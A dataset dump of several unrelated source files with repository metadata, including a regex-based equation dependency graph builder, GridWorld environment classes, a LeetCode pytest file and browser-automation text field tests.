|
app.py
|
johnyenter-briars/Grove
|
a1a3e784b3ae22113d2596ecea019b52aa2c138d
|
[
"MIT"
] | null | null | null |
app.py
|
johnyenter-briars/Grove
|
a1a3e784b3ae22113d2596ecea019b52aa2c138d
|
[
"MIT"
] | null | null | null |
app.py
|
johnyenter-briars/Grove
|
a1a3e784b3ae22113d2596ecea019b52aa2c138d
|
[
"MIT"
] | null | null | null |
# Run with: python[3] -m flask run
from app import app
@app.shell_context_processor
def make_shell_context():
return None
| 18.142857
| 34
| 0.755906
| 21
| 127
| 4.380952
| 0.761905
| 0.26087
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.009434
| 0.165354
| 127
| 6
| 35
| 21.166667
| 0.858491
| 0.251969
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.25
| true
| 0
| 0.25
| 0.25
| 0.75
| 0
| 1
| 0
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 1
| 1
| 0
|
0
| 7
|
97535ff3d5d19686ec6902733ccf45e846fbb86b
| 23
|
py
|
Python
|
tsl2561/__init__.py
|
frillip/tsl2561
|
b974c6b6efced92dd3e63ec423ee72190420a931
|
[
"BSD-3-Clause"
] | 42
|
2015-12-08T22:52:20.000Z
|
2021-05-17T10:19:18.000Z
|
tsl2561/__init__.py
|
frillip/tsl2561
|
b974c6b6efced92dd3e63ec423ee72190420a931
|
[
"BSD-3-Clause"
] | 11
|
2016-06-23T19:24:02.000Z
|
2017-07-31T06:23:54.000Z
|
tsl2561/__init__.py
|
frillip/tsl2561
|
b974c6b6efced92dd3e63ec423ee72190420a931
|
[
"BSD-3-Clause"
] | 17
|
2015-08-30T03:00:10.000Z
|
2020-02-14T09:59:39.000Z
|
from .tsl2561 import *
| 11.5
| 22
| 0.73913
| 3
| 23
| 5.666667
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.210526
| 0.173913
| 23
| 1
| 23
| 23
| 0.684211
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
9773751a40ec2dadc9f924ad58128a924f03348e
| 22,481
|
py
|
Python
|
graphFromText/graphByEquals.py
|
Pascal1755/Equation-Symbol-Visualization
|
9107b5014eedc83acde2074232efc34e470c363e
|
[
"MIT"
] | null | null | null |
graphFromText/graphByEquals.py
|
Pascal1755/Equation-Symbol-Visualization
|
9107b5014eedc83acde2074232efc34e470c363e
|
[
"MIT"
] | null | null | null |
graphFromText/graphByEquals.py
|
Pascal1755/Equation-Symbol-Visualization
|
9107b5014eedc83acde2074232efc34e470c363e
|
[
"MIT"
] | null | null | null |
import re
from graphFromText.fxnFromText.fxnGraph import getSymbolGraphMulti
##################### Will map x + y = z + u as {'x':['z','u','y']} ##########################
def graphByEquals2(Text):
#"tokenize" or parse according to newline character, \n
listOfEquations = re.split(r'\n',Text)
# strip whitespace, remove tabs and remove blank entries
for k, eq in enumerate(listOfEquations):
eq.strip()
eq.replace("\t","")
listOfEquations[k]= eq.replace(" ","")
while ('' in listOfEquations):
listOfEquations.remove('')
#### Create a graphOfLeft and a graphOfRight based upon the equations in listOfEquations ####
#
#The graphOfLeft will make all symbols on the right hand side point to the left hand symbol
#The graphOfRight will do the opposite and the left hand symbol will point to all right
#hand symbols.
#
#An example:
#From the equation a=b+c, the graphOfLeft would have 'a':['b','c']. This would be
#interpreted as 'b' and 'c' affect 'a'. The graphOfRight would be 'b':['a'] and 'c':['a'].
#This would be interpreted as 'a' depends upon 'b' and also 'a' depends upon 'c'.
graphOfLeft = dict()
graphOfRight = dict()
inputError=None
for k, eq in enumerate(listOfEquations):
result = re.split(r'={1}', eq) # split into LHS and RHS by exactly one equals sign
# Left Hand Side (LHS) is every word to the left of exactly one equals sign
# Right Hand Side (RHS) is every word to the right of exactly one equals sign
# print("LHS:",result[0]," RHS:",result[1]," len=",len(result))
# if there is a LHS and RHS, then it is an assignment or equation. Otherwise, it is not.
# Also, filter out the cases where a <= or >= is found in the result
if (len(result) == 2 and result[0].find("<") == -1 \
and result[0].find(">") == -1 and result[1].find("<") == -1 \
and result[1].find(">") == -1):
#LHS = re.findall(r'\w+', result[0])
#RHS = re.findall(r'\w+', result[1])
foundLeft = re.findall(r'\w+', result[0])
LHS=[]
for expr in foundLeft:
leftMatch = re.match(r'^[a-zA-Z]+[0-9a-zA-Z_]*',expr)
if (leftMatch is None \
and re.match(r'^[0-9]+[a-zA-Z_]+', expr) is not None):
inputError = ValueError('\nillegal expression:\n' + expr)
elif (leftMatch is not None):
LHS.append(leftMatch.group(0))
foundRight = re.findall(r'\w+', result[1])
RHS=[]
for expr in foundRight:
rightMatch = re.match(r'^[a-zA-Z]+[0-9a-zA-Z_]*',expr)
if (rightMatch is None \
and re.match(r'^[0-9]+[a-zA-Z_]+', expr) is not None):
inputError = ValueError('\nillegal expression:\n' + expr)
elif (rightMatch is not None):
RHS.append(rightMatch.group(0))
###### special case for numbers only on RHS ######
if ( len(result[1]) != 0 and len(RHS) == 0 ):
crazy = r'[+-]?\d+\.?\d*[eE][+-]?\d+|[-]?\d+\.\d+|[-]?\d+'
numberMatch = re.findall(crazy, result[1])
if (len(numberMatch) != 0):
for expr in numberMatch:
RHS.append(expr)
if (LHS and RHS):
#If there is more than one entry in the LHS, move LHS[1], LHS[2], etc. over
#to RHS array, leaving LHS[0] alone
if (len(LHS) > 1):
for k in range(1,len(LHS)):
RHS.append(LHS[k])
del LHS[1:len(LHS)]
if (LHS[0] not in graphOfLeft):
graphOfLeft[LHS[0]] = RHS.copy()
else:
for item in RHS:
graphOfLeft[LHS[0]].append(item)
inputError=ValueError('\nconflicting definition in line:\n' + eq)
for key in RHS:
# print(key,LHS[0])
if (key is not None) and (LHS[0] is not None):
if (key not in graphOfRight):
graphOfRight[key] = [LHS[0]]
else:
graphOfRight[key].append(LHS[0])
else:
inputError=ValueError('incomplete equation expression found in line:\n' + eq)
else:
inputError=ValueError('non-equation expression found in line:\n' + eq)
return graphOfLeft, inputError
##################### Will map x + y = z + u as {'x':['z','u','y'],'y':['z','u','x']} #####################
def graphByEquals3(Text):
listOfEquations = re.split(r'\n',Text)
#strip whitespace and remove blank entries
# strip whitespace and remove blank entries
for k, eq in enumerate(listOfEquations):
listOfEquations[k]= eq.replace(" ","")
#print(len(listOfEquations[k]))
while ('' in listOfEquations):
listOfEquations.remove('')
#print(listOfEquations)
graphOfLeft = dict()
graphOfRight = dict()
inputError=None
for k, eq in enumerate(listOfEquations):
result = re.split(r'={1}', eq) # split into LHS and RHS by exactly one equals sign
# Left Hand Side (LHS) is every word to the left of exactly one equals sign
# Right Hand Side (RHS) is every word to the right of exactly one equals sign
# print("LHS:",result[0]," RHS:",result[1]," len=",len(result))
# if there is a LHS and RHS, then it is an assignment or equation. Otherwise, it is not.
# Also, filter out the cases where a <= or >= is found in the result
if (len(result) == 2 and result[0].find("<") == -1 \
and result[0].find(">") == -1 and result[1].find("<") == -1 \
and result[1].find(">") == -1):
#LHS = re.findall(r'\w+', result[0])
#RHS = re.findall(r'\w+', result[1])
foundLeft = re.findall(r'\w+', result[0])
LHS=[]
for expr in foundLeft:
leftMatch = re.match(r'^[a-zA-Z]+[0-9a-zA-Z_]*',expr)
if (leftMatch is None \
and re.match(r'^[0-9]+[a-zA-Z_]+', expr) is not None):
inputError = ValueError('\nillegal expression:\n' + expr)
elif (leftMatch is not None):
LHS.append(leftMatch.group(0))
foundRight = re.findall(r'\w+', result[1])
RHS=[]
for expr in foundRight:
rightMatch = re.match(r'^[a-zA-Z]+[0-9a-zA-Z_]*',expr)
if (rightMatch is None \
and re.match(r'^[0-9]+[a-zA-Z_]+', expr) is not None):
inputError = ValueError('\nillegal expression:\n' + expr)
elif (rightMatch is not None):
RHS.append(rightMatch.group(0))
###### special case for numbers only on RHS ######
if ( len(result[1]) != 0 and len(RHS) == 0 ):
crazy = r'[+-]?\d+\.?\d*[eE][+-]?\d+|[-]?\d+\.\d+|[-]?\d+'
numberMatch = re.findall(crazy,result[1])
if (len(numberMatch) != 0):
for expr in numberMatch:
RHS.append(expr)
if (LHS and RHS):
for k, key in enumerate(LHS):
if (key not in graphOfLeft):
graphOfLeft[key] = RHS.copy()
#print('key = ' + key + ', RHS = ', RHS)
else:
for item in RHS:
if (item not in graphOfLeft[key]):
graphOfLeft[key].append(item)
#inputError=ValueError('conflicting definition in line:\n' + eq)
#print('before adding other left:\n',graphOfLeft)
for kk, otherkey in enumerate(LHS):
if (key is not None) and (otherkey is not None)\
and (key != otherkey)\
and (otherkey not in graphOfLeft[key]):
#print('key = ' + key + ', otherkey = ' + otherkey)
graphOfLeft[key].append(otherkey)
#print(graphOfLeft[key])
#print('it\'s a multi-expression eq.: ' + key + ',' + otherkey + '\n')
for key in RHS:
# print(key,LHS[0])
if (key is not None) and (LHS[0] is not None):
if (key not in graphOfRight):
graphOfRight[key] = [LHS[0]]
else:
graphOfRight[key].append(LHS[0])
else:
inputError=ValueError('incomplete equation expression found in line:\n' + eq)
else:
inputError=ValueError('non-equation expression found in line:\n' + eq)
return graphOfLeft, inputError
##################### Will map x + y = z + u as {'x':['z','u'],'y':['z','u']} ##########################
def graphByEquals4(Text):
listOfEquations = re.split(r'\n',Text)
#strip whitespace and remove blank entries
#strip whitespace and remove blank entries
for k, eq in enumerate(listOfEquations):
listOfEquations[k]= eq.replace(" ","")
#print(len(listOfEquations[k]))
while ('' in listOfEquations):
listOfEquations.remove('')
#print(listOfEquations)
graphOfLeft = dict()
graphOfRight = dict()
inputError=None
for k, eq in enumerate(listOfEquations):
result = re.split(r'={1}', eq) # split into LHS and RHS by exactly one equals sign
# Left Hand Side (LHS) is every word to the left of exactly one equals sign
# Right Hand Side (RHS) is every word to the right of exactly one equals sign
# print("LHS:",result[0]," RHS:",result[1]," len=",len(result))
# if there is a LHS and RHS, then it is an assignment or equation. Otherwise, it is not.
# Also, filter out the cases where a <= or >= is found in the result
if (len(result) == 2 and result[0].find("<") == -1 \
and result[0].find(">") == -1 and result[1].find("<") == -1 \
and result[1].find(">") == -1):
#LHS = re.findall(r'\w+', result[0])
#RHS = re.findall(r'\w+', result[1])
foundLeft = re.findall(r'\w+', result[0])
LHS=[]
for expr in foundLeft:
leftMatch = re.match(r'^[a-zA-Z]+[0-9a-zA-Z_]*',expr)
if (leftMatch is None \
and re.match(r'^[0-9]+[a-zA-Z_]+', expr) is not None):
inputError = ValueError('\nillegal expression:\n' + expr)
elif (leftMatch is not None):
LHS.append(leftMatch.group(0))
foundRight = re.findall(r'\w+', result[1])
RHS=[]
for expr in foundRight:
rightMatch = re.match(r'^[a-zA-Z]+[0-9a-zA-Z_]*',expr)
if (rightMatch is None \
and re.match(r'^[0-9]+[a-zA-Z_]+', expr) is not None):
inputError = ValueError('\nillegal expression:\n' + expr)
elif (rightMatch is not None):
RHS.append(rightMatch.group(0))
###### special case for numbers only on RHS ######
if ( len(result[1]) != 0 and len(RHS) == 0 ):
crazy = r'[+-]?\d+\.?\d*[eE][+-]?\d+|[-]?\d+\.\d+|[-]?\d+'
numberMatch = re.findall(crazy, result[1])
if (len(numberMatch) != 0):
for expr in numberMatch:
RHS.append(expr)
if (LHS and RHS):
for k, key in enumerate(LHS):
if (key not in graphOfLeft):
graphOfLeft[key] = RHS.copy()
#print('key = ' + key + ', RHS = ', RHS)
else:
for item in RHS:
if (item not in graphOfLeft[key]):
graphOfLeft[key].append(item)
#inputError=ValueError('conflicting definition in line:\n' + eq)
#print('before adding other left:\n',graphOfLeft)
#for kk, otherkey in enumerate(LHS):
#if (key is not None) and (otherkey is not None)\
#and (key != otherkey)\
#and (otherkey not in graphOfLeft[key]):
#print('key = ' + key + ', otherkey = ' + otherkey)
#graphOfLeft[key].append(otherkey)
#print(graphOfLeft[key])
#print('it\'s a multi-expression eq.: ' + key + ',' + otherkey + '\n')
for key in RHS:
# print(key,LHS[0])
if (key is not None) and (LHS[0] is not None):
if (key not in graphOfRight):
graphOfRight[key] = [LHS[0]]
else:
graphOfRight[key].append(LHS[0])
else:
inputError=ValueError('incomplete equation expression found in line:\n' + eq)
else:
inputError=ValueError('non-equation expression found in line:\n' + eq)
return graphOfLeft, inputError
##################### Will map z = f(x,y) + u as {'z':['f','u'],'f':['x',y']}, figuratively ###############
##################### Note that the actual graph items are tuples, like ('f',4,'fxn',0,0) #################
##################### The tuples are the following format: (symbolName,character,type,fxnLevel,eqNum) #####
def graphByEqualsFxn1(Text):
listOfEquations = re.split(r'\n', Text)
# strip whitespace and remove blank entries
for k, eq in enumerate(listOfEquations):
listOfEquations[k] = eq.replace(" ", "")
while ('' in listOfEquations):
listOfEquations.remove('')
# print(listOfEquations)
inputError = None
leftHandLinesOfText = []
rightHandLinesOfText = []
for k, eq in enumerate(listOfEquations):
result = re.split(r'={1}', eq) # split into LHS and RHS by exactly one equals sign
# Left Hand Side (LHS) is every word to the left of exactly one equals sign
# Right Hand Side (RHS) is every word to the right of exactly one equals sign
# print("LHS:",result[0]," RHS:",result[1]," len=",len(result))
# if there is a LHS and RHS, then it is an assignment or equation. Otherwise, it is not.
# Also, filter out the cases where a <= or >= is found in the result
if (len(result) == 2 and result[0].find("<") == -1 \
and result[0].find(">") == -1 and result[1].find("<") == -1 \
and result[1].find(">") == -1):
# LHS = re.findall(r'\w+', result[0])
# RHS = re.findall(r'\w+', result[1])
foundLeft = re.findall(r'\w+', result[0])
for expr in foundLeft:
leftMatch = re.match(r'^[a-zA-Z]+[0-9a-zA-Z_]*', expr)
if (leftMatch is None \
and re.match(r'^[0-9]+[a-zA-Z_]+', expr) is not None):
inputError = ValueError('\nillegal expression:\n' + expr)
#elif (leftMatch is not None):
#LHS.append(leftMatch.group(0))
foundRight = re.findall(r'\w+', result[1])
for expr in foundRight:
rightMatch = re.match(r'^[a-zA-Z]+[0-9a-zA-Z_]*', expr)
if (rightMatch is None \
and re.match(r'^[0-9]+[a-zA-Z_]+', expr) is not None):
inputError = ValueError('\nillegal expression:\n' + expr)
#elif (rightMatch is not None):
#RHS.append(rightMatch.group(0))
##### check RHS for unbalanced parenthesis #####
parenCnt = 0
for char in result[1]:
if char == '(':
parenCnt+=1
elif char == ')':
parenCnt-=1
if ( parenCnt != 0 ):
inputError = ValueError('\nunbalanced parenthesis:\n' + eq)
# issue with error message fix, 4/11/2021
#inputError = ValueError('\nunbalanced parenthesis:\n' + expr)
###### special case for numbers only on RHS ######
#if (len(result[1]) != 0 and len(RHS) == 0):
#crazy = r'[+-]?\d+\.?\d*[eE][+-]?\d+|[-]?\d+\.\d+|[-]?\d+'
#numberMatch = re.findall(crazy, result[1])
#if (len(numberMatch) != 0):
#for expr in numberMatch:
#RHS.append(expr)
if (inputError is None):
for k, left in enumerate(foundLeft):
leftHandLinesOfText.append(left)
rightHandLinesOfText.append(result[1])
#else statement commented out on 4/9/2021
#else:
#inputError = ValueError('incomplete equation expression found in line:\n' + eq)
else:
inputError = ValueError('non-equation expression found in line:\n' + eq)
#### LHS and RHS are populated ####
if (inputError is None):
symbolGraphMulti = getSymbolGraphMulti(leftHandLinesOfText, rightHandLinesOfText)
else:
symbolGraphMulti = dict()
return symbolGraphMulti, inputError
'''
##################### Will map x + y = z + u as {'x':['z','u'],'y':['z','u']} ##########################
def graphByEquals4(Text):
listOfEquations = re.split(r'\n',Text)
#strip whitespace and remove blank entries
# strip whitespace and remove blank entries
for k, eq in enumerate(listOfEquations):
listOfEquations[k]= eq.replace(" ","")
#print(len(listOfEquations[k]))
while ('' in listOfEquations):
listOfEquations.remove('')
#print(listOfEquations)
graphOfLeft = dict()
graphOfRight = dict()
inputError=None
for k, eq in enumerate(listOfEquations):
result = re.split(r'={1}', eq) # split into LHS and RHS by exactly one equals sign
# Left Hand Side (LHS) is every word to the left of exactly one equals sign
# Right Hand Side (RHS) is every word to the right of exactly one equals sign
# print("LHS:",result[0]," RHS:",result[1]," len=",len(result))
# if there is a LHS and RHS, then it is an assignment or equation. Otherwise, it is not.
# Also, filter out the cases where a <= or >= is found in the result
if (len(result) == 2 and result[0].find("<") == -1 \
and result[0].find(">") == -1 and result[1].find("<") == -1 \
and result[1].find(">") == -1):
#LHS = re.findall(r'\w+', result[0])
#RHS = re.findall(r'\w+', result[1])
foundLeft = re.findall(r'\w+', result[0])
LHS=[]
for expr in foundLeft:
leftMatch = re.match(r'^[a-zA-Z]+[0-9a-zA-Z_]*',expr)
if (leftMatch is None \
and re.match(r'^[0-9]+[a-zA-Z_]+', expr) is not None):
inputError = ValueError('\nillegal expression:\n' + expr)
elif (leftMatch is not None):
LHS.append(leftMatch.group(0))
#### Under development ####
fxnOnRight=re.search(r'(\w+)\((.*)\)', result[1])
if (fxnOnRight is not None):
fxnName = fxnOnRight.groups(0)
else:
foundRight = re.findall(r'\w+', result[1])
RHS=[]
for expr in foundRight:
rightMatch = re.match(r'^[a-zA-Z]+[0-9a-zA-Z_]*',expr)
if (rightMatch is None \
and re.match(r'^[0-9]+[a-zA-Z_]+', expr) is not None):
inputError = ValueError('\nillegal expression:\n' + expr)
elif (rightMatch is not None):
RHS.append(rightMatch.group(0))
###### special case for numbers only on RHS ######
if ( len(result[1]) != 0 and len(RHS) == 0 ):
num_regex = r'[+-]?\d+\.?\d*[eE][+-]?\d+|[-]?\d+\.\d+|[-]?\d+'
numberMatch = re.findall(num_regex, result[1])
if (len(numberMatch) != 0):
for expr in numberMatch:
RHS.append(expr)
if (LHS and RHS):
for k, key in enumerate(LHS):
if (key not in graphOfLeft):
graphOfLeft[key] = RHS.copy()
#print('key = ' + key + ', RHS = ', RHS)
else:
for item in RHS:
if (item not in graphOfLeft[key]):
graphOfLeft[key].append(item)
#inputError=ValueError('conflicting definition in line:\n' + eq)
#print('before adding other left:\n',graphOfLeft)
#for kk, otherkey in enumerate(LHS):
#if (key is not None) and (otherkey is not None)\
#and (key != otherkey)\
#and (otherkey not in graphOfLeft[key]):
#print('key = ' + key + ', otherkey = ' + otherkey)
#graphOfLeft[key].append(otherkey)
#print(graphOfLeft[key])
#print('it\'s a multi-expression eq.: ' + key + ',' + otherkey + '\n')
for key in RHS:
# print(key,LHS[0])
if (key is not None) and (LHS[0] is not None):
if (key not in graphOfRight):
graphOfRight[key] = [LHS[0]]
else:
graphOfRight[key].append(LHS[0])
else:
inputError=ValueError('incomplete equation expression found in line:\n' + eq)
else:
inputError=ValueError('non-equation expression found in line:\n' + eq)
return graphOfLeft, inputError
'''
| 46.641079
| 107
| 0.488501
| 2,606
| 22,481
| 4.205679
| 0.081351
| 0.018248
| 0.028741
| 0.020073
| 0.861131
| 0.845712
| 0.845712
| 0.843887
| 0.839964
| 0.829836
| 0
| 0.014545
| 0.360838
| 22,481
| 482
| 108
| 46.641079
| 0.748208
| 0.222677
| 0
| 0.837719
| 0
| 0
| 0.087762
| 0.02641
| 0
| 0
| 0
| 0
| 0
| 1
| 0.017544
| false
| 0
| 0.008772
| 0
| 0.04386
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
979a794d31b04edecc9cc8a7d6a3389c2fc8c7df
| 2,586
|
py
|
Python
|
environment.py
|
SSchwoebel/ActiveInferenceBPBethe
|
76301d4495fdbb3940be8580c42a0e82789a921a
|
[
"MIT"
] | 1
|
2020-08-02T06:38:54.000Z
|
2020-08-02T06:38:54.000Z
|
environment.py
|
SSchwoebel/ActiveInferenceBPBethe
|
76301d4495fdbb3940be8580c42a0e82789a921a
|
[
"MIT"
] | null | null | null |
environment.py
|
SSchwoebel/ActiveInferenceBPBethe
|
76301d4495fdbb3940be8580c42a0e82789a921a
|
[
"MIT"
] | 1
|
2021-06-07T15:17:17.000Z
|
2021-06-07T15:17:17.000Z
|
"""This module contains various experimental environments used for testing
human behavior."""
import numpy as np
class GridWorld(object):
def __init__(self, Omega, Theta,
trials = 1, T = 10):
#set probability distribution used for generating observations
self.Omega = Omega.copy()
#set probability distribution used for generating state transitions
self.Theta = Theta.copy()
#set container that keeps track the evolution of the hidden states
self.hidden_states = np.zeros((trials, T), dtype = int)
def set_initial_states(self, tau):
#start in lower corner
self.hidden_states[tau, 0] = 1
if tau%100==0:
print("trial:", tau)
def generate_observations(self, tau, t):
#generate one sample from multinomial distribution
o = np.random.multinomial(1, self.Omega[:, self.hidden_states[tau, t]]).argmax()
return o
def update_hidden_states(self, tau, t, response):
current_state = self.hidden_states[tau, t-1]
self.hidden_states[tau, t] = np.random.choice(self.Theta.shape[0],
p = self.Theta[:, current_state, int(response)])
"""
test: please ignore
"""
class FakeGridWorld(object):
def __init__(self, Omega, Theta,
hidden_states, trials = 1, T = 10):
#set probability distribution used for generating observations
self.Omega = Omega.copy()
#set probability distribution used for generating state transitions
self.Theta = Theta.copy()
#set container that keeps track the evolution of the hidden states
self.hidden_states = np.zeros((trials, T), dtype = int)
self.hidden_states[:] = np.array([hidden_states for i in range(trials)])
def set_initial_states(self, tau):
#start in lower corner
self.hidden_states[tau, 0] = 1
#print("trial:", tau)
def generate_observations(self, tau, t):
#generate one sample from multinomial distribution
o = np.random.multinomial(1, self.Omega[:, self.hidden_states[tau, t]]).argmax()
return o
def update_hidden_states(self, tau, t, response):
current_state = self.hidden_states[tau, t-1]
self.hidden_states[tau, t] = np.random.choice(self.Theta.shape[0],
p = self.Theta[:, current_state, int(response)])
| 33.584416
| 88
| 0.596674
| 308
| 2,586
| 4.896104
| 0.25974
| 0.135279
| 0.116711
| 0.100796
| 0.859416
| 0.859416
| 0.823607
| 0.823607
| 0.823607
| 0.823607
| 0
| 0.011142
| 0.305878
| 2,586
| 77
| 89
| 33.584416
| 0.828969
| 0.24478
| 0
| 0.764706
| 0
| 0
| 0.00314
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.235294
| false
| 0
| 0.029412
| 0
| 0.382353
| 0.029412
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
97a8f3a1065c39838501321a97ab9daf3aa5d26c
| 1,074
|
py
|
Python
|
tests/test_1952.py
|
sungho-joo/leetcode2github
|
ce7730ef40f6051df23681dd3c0e1e657abba620
|
[
"MIT"
] | null | null | null |
tests/test_1952.py
|
sungho-joo/leetcode2github
|
ce7730ef40f6051df23681dd3c0e1e657abba620
|
[
"MIT"
] | null | null | null |
tests/test_1952.py
|
sungho-joo/leetcode2github
|
ce7730ef40f6051df23681dd3c0e1e657abba620
|
[
"MIT"
] | null | null | null |
#!/usr/bin/env python
import pytest
"""
Test 1952. Three Divisors
"""
@pytest.fixture(scope="session")
def init_variables_1952():
from src.leetcode_1952_three_divisors import Solution
solution = Solution()
def _init_variables_1952():
return solution
yield _init_variables_1952
class TestClass1952:
def test_solution_0(self, init_variables_1952):
assert not init_variables_1952().isThree(2)
def test_solution_1(self, init_variables_1952):
assert init_variables_1952().isThree(4)
#!/usr/bin/env python
import pytest
"""
Test 1952. Three Divisors
"""
@pytest.fixture(scope="session")
def init_variables_1952():
from src.leetcode_1952_three_divisors import Solution
solution = Solution()
def _init_variables_1952():
return solution
yield _init_variables_1952
class TestClass1952:
def test_solution_0(self, init_variables_1952):
assert not init_variables_1952().isThree(2)
def test_solution_1(self, init_variables_1952):
assert init_variables_1952().isThree(4)
| 18.842105
| 57
| 0.728119
| 138
| 1,074
| 5.333333
| 0.231884
| 0.247283
| 0.32337
| 0.108696
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0.100228
| 0.182495
| 1,074
| 56
| 58
| 19.178571
| 0.738041
| 0.037244
| 0
| 1
| 0
| 0
| 0.014493
| 0
| 0
| 0
| 0
| 0
| 0.153846
| 1
| 0.307692
| false
| 0
| 0.153846
| 0.076923
| 0.615385
| 0
| 0
| 0
| 0
| null | 1
| 1
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 1
| 0
|
0
| 11
|
c119212d5c0baad240a7a79a5342c350c59238fb
| 9,855
|
py
|
Python
|
tests/browser/elements/text_field_tests.py
|
harsh183/nerodia
|
69c5e4408432e85b5af0b2da03015f729809dac4
|
[
"MIT"
] | 83
|
2017-11-20T08:41:09.000Z
|
2022-02-09T21:01:47.000Z
|
tests/browser/elements/text_field_tests.py
|
harsh183/nerodia
|
69c5e4408432e85b5af0b2da03015f729809dac4
|
[
"MIT"
] | 28
|
2017-11-21T02:25:03.000Z
|
2021-04-15T15:26:30.000Z
|
tests/browser/elements/text_field_tests.py
|
harsh183/nerodia
|
69c5e4408432e85b5af0b2da03015f729809dac4
|
[
"MIT"
] | 14
|
2017-11-29T06:44:12.000Z
|
2021-09-06T04:53:44.000Z
|
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from re import IGNORECASE, compile
import pytest
from nerodia.exception import ObjectReadOnlyException, UnknownObjectException
pytestmark = pytest.mark.page('forms_with_input_elements.html')
class TestTextFieldExist(object):
def test_returns_true_if_the_element_exists(self, browser):
assert browser.text_field(id='new_user_email').exists is True
assert browser.text_field(id=compile(r'new_user_email')).exists is True
assert browser.text_field(name='new_user_email').exists is True
assert browser.text_field(name=compile(r'new_user_email')).exists is True
assert browser.text_field(name=compile(r'new_user_occupation', flags=IGNORECASE)).exists is True
assert browser.text_field(value='Developer').exists is True
assert browser.text_field(value=compile(r'Developer')).exists is True
assert browser.text_field(class_name='name').exists is True
assert browser.text_field(class_name=compile(r'name')).exists is True
assert browser.text_field(index=0).exists is True
assert browser.text_field(xpath="//input[@id='new_user_email']").exists is True
assert browser.text_field(label='First name').exists is True
assert browser.text_field(label=compile(r'([qa])st? name')).exists is True
assert browser.text_field(label='Without for').exists is True
assert browser.text_field(label=compile(r'Without for')).exists is True
assert browser.text_field(label='With hidden text').exists is True
assert browser.text_field(visible_label='With text').exists is True
# This will work after text is deprecated for visible_text
# assert browser.text_field(label=compile(r'With hidden text')).exists is True
assert browser.text_field(visible_label=compile(r'With text')).exists is True
def test_locates_value_of_text_field_using_text_locator(self, browser):
assert browser.text_field(text='Developer').exists is True
assert browser.text_field(text=compile(r'Developer')).exists is True
def test_returns_the_first_text_field_if_given_no_args(self, browser):
assert browser.text_field().exists
def test_respects_text_fields_types(self, browser):
assert browser.text_field().type == 'text'
def test_returns_true_if_the_element_exists_no_type_attribute(self, browser):
assert browser.text_field(id='new_user_first_name').exists is True
def test_returns_true_if_the_element_exists_invalid_type_attribute(self, browser):
assert browser.text_field(id='new_user_last_name').exists is True
def test_returns_true_for_element_with_upper_case_type(self, browser):
assert browser.text_field(id='new_user_email_confirm').exists is True
def test_returns_true_for_element_with_unknown_type(self, browser):
assert browser.text_field(id='unknown_text_field').exists is True
def test_returns_false_if_the_element_does_not_exist(self, browser):
assert browser.text_field(id='no_such_id').exists is False
assert browser.text_field(id=compile(r'no_such_id')).exists is False
assert browser.text_field(name='no_such_name').exists is False
assert browser.text_field(name=compile(r'no_such_name')).exists is False
assert browser.text_field(value='no_such_value').exists is False
assert browser.text_field(value=compile(r'no_such_value')).exists is False
assert browser.text_field(text='no_such_text').exists is False
assert browser.text_field(text=compile(r'no_such_text')).exists is False
assert browser.text_field(class_name='no_such_class').exists is False
assert browser.text_field(class_name=compile(r'no_such_class')).exists is False
assert browser.text_field(index=1337).exists is False
assert browser.text_field(xpath="//input[@id='no_such_id']").exists is False
assert browser.text_field(label='bad_label').exists is False
assert browser.text_field(label=compile(r'bad_label')).exists is False
assert browser.text_field(label='With text').exists is False
assert browser.text_field(visible_label='With hidden text').exists is False
# This will work after text is deprecated for visible_text
# assert browser.text_field(label=compile(r'With text')).exists is False
assert browser.text_field(visible_label=compile(r'With hidden text')).exists is False
# input type='hidden' should not be found by #text_field
assert browser.text_field(id='new_user_interests_dolls').exists is False
def test_raises_correct_exception_when_what_argument_is_invalid(self, browser):
with pytest.raises(TypeError):
browser.text_field(id=3.14).exists
class TestTextFieldAttributes(object):
# id
def test_returns_the_id_if_the_element_exists_and_has_id(self, browser):
assert browser.text_field(index=4).id == 'new_user_occupation'
@pytest.mark.usefixtures('quick_timeout')
def test_raises_correct_exception_for_id_if_the_element_doesnt_exist(self, browser):
with pytest.raises(UnknownObjectException):
browser.text_field(index=1337).id
# name
def test_returns_the_name_if_the_element_exists_and_has_name(self, browser):
assert browser.text_field(index=3).name == 'new_user_email_confirm'
@pytest.mark.usefixtures('quick_timeout')
def test_raises_correct_exception_for_name_if_the_element_doesnt_exist(self, browser):
with pytest.raises(UnknownObjectException):
browser.text_field(index=1337).name
# title
